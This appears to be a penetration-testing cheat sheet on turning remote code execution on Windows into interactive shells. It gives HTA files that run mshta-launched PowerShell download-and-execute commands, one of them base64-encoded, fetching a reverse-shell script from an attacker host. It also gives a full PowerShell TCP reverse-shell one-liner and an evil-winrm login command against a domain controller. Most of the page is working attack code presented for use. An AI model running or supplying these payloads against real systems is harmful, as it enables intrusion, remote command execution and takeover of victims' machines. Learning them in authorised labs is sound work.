Skip to content

Getting shells from RCE on Windows #

These are just some of the ways

mshta #

  • Two types of files to download and execute

    • .hta
    • .sct
  • Two types of ways (that I know of) to retrieve

    • http
      • mshta http://webserver/payload.hta
    • smb
      • mshta \\webdavserver\folder\payload.hta
  • Script: Arno0x

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    <html>
    <head>
    <HTA:APPLICATION ID="HelloExample">
    <script language="jscript">
            var c = "cmd.exe /c calc.exe"; 
            new ActiveXObject('WScript.Shell').Run(c);
    </script>
    </head>
    <body>
    <script>self.close();</script>
    </body>
    </html>
    

  • Sample usage to get powershell shell

    1. On your Kali, host (i.e. python3 -m http.server) the two files
      • an hta file, i.e. from: Arno0x
         1
         2
         3
         4
         5
         6
         7
         8
         9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        <html>
        <head>
        <HTA:APPLICATION ID="HelloExample">
        <script language="jscript">
                var a = 'powershell -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadString("""http://<YOUR_KALI_IP_OR_FILEHOSTING_MACHINE>:8000/mini-reverse.ps1""")'
                var b = 'powershell -Exec Bypass -c "IEX(New-Object System.Net.WebClient).DownloadString("""http://<YOUR_KALI_IP_OR_FILEHOSTING_MACHINE>:8000/mini-reverse.ps1""")"'
                var c = 'powershell -Exec Bypass -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKABoAHQAdABwADoALwAvADwAWQBPAFUAUgBfAEsAQQBMAEkAXwBJAFAAXwBPAFIAXwBGAEkATABFAEgATwBTAFQASQBOAEcAXwBNAEEAQwBIAEkATgBFAD4AOgA4ADAAMAAwAC8AbQBpAG4AaQAtAHIAZQB2AGUAcgBzAGUALgBwAHMAMQApAA=='
                new ActiveXObject('WScript.Shell').Run(a);
        </script>
        <!-- -------READ------- -->
        <!--var c is base64 encoded with the value of "IEX(New-Object System.Net.WebClient).DownloadString('http://<YOUR_KALI_IP_OR_FILEHOSTING_MACHINE>:8000/mini-reverse.ps1')" -->
        <!-- """ does not work in encoding, use proper syntax -->
        <!-- choose between var a,b or c to replace 'x' in ...').Run(x) above
        </head>
        <body>
        <script>self.close();</script>
        </body>
        </html>
        
      • mini-reverse.ps1 from @staaldraad
        • Modify to change IP Address and port of reverse shell listener
    2. On your Kali, Run your reverse shell listener (msf exploit/multi/hanlder or nc)
    3. On the target machine, execute:
      1
      mshta http://<YOUR_KALI_IP_OR_FILEHOSTING_MACHINE>:8000/mini-reverse.hta
      

Powershell #

  • Please see script with examples above (mshta - var a,b and c)
  • To be added here and more
  • Working shells I have tried:

One-liners #

  • Famous powershell one-liner
    1
    powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
    
  • You can [base64 encode] the block above and execute with this:

Fully interactive powershell #

Tools for remote CLI connection #

  • Evil-Winrm 12
    1
    bundle exec evil-winrm -s "/opt/PowerSharpPack/PowerSharpBinaries" -e "/opt/Sharp collection/NetFramework_4.5_x64" -i DC.ACME.LOCAL  -u administrator -p '[email protected]'
    

Last update: June 8, 2021